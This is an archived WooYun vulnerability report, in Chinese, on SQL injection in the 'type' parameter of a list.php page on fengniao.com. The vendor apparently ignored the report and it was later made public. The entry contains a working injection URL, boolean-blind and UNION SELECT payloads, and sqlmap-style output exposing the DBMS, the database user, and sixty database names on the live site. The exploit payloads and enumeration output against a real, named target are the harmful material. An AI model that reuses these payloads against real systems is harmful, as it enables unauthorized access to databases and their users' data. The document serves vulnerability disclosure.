乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-06: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-20: 厂商已经主动忽略漏洞,细节向公众公开
http://www.fengniao.com/active/20100415_zhuyi/list.php?type=-1%20OR%20length(database())=8%20AND%20000544%3d000544%20--%20
---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=1 AND 3170=3170 Type: UNION query Title: MySQL UNION query (88) - 2 columns Payload: type=1 UNION ALL SELECT 88,CONCAT(0x716a6b7871,0x72774766587364425077,0x716b787671)#---web application technology: Nginxback-end DBMS: MySQL 5current user: '[email protected]%'current user is DBA: Falseavailable databases [60]:[*] 08dream_photo[*] activity[*] activity2[*] advertise[*] album[*] baseuser[*] blog[*] camera[*] canon[*] channels[*] cms[*] cnet_cn[*] company[*] digishop[*] digital_camera[*] ecard[*] f_zb[*] fengniao[*] fn_2008[*] fn_ask[*] fn_atools[*] fn_cms[*] fn_complain[*] fn_exhibition[*] fn_match[*] fn_my[*] fn_picture[*] fn_product[*] fn_shuo[*] fn_shuo_content[*] fn_special[*] fn_tuan[*] fn_wd[*] fnmall[*] fnmatch[*] image[*] info[*] information_schema[*] kingston[*] kingston_pet[*] kmr2[*] misc[*] model[*] model09[*] mysql[*] news[*] onlineshop[*] photographer[*] pic2dc[*] product[*] sample[*] seagate[*] survey[*] survey_07[*] tags[*] talk[*] test[*] usedmarket[*] valbum[*] vbbrc2
修复
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)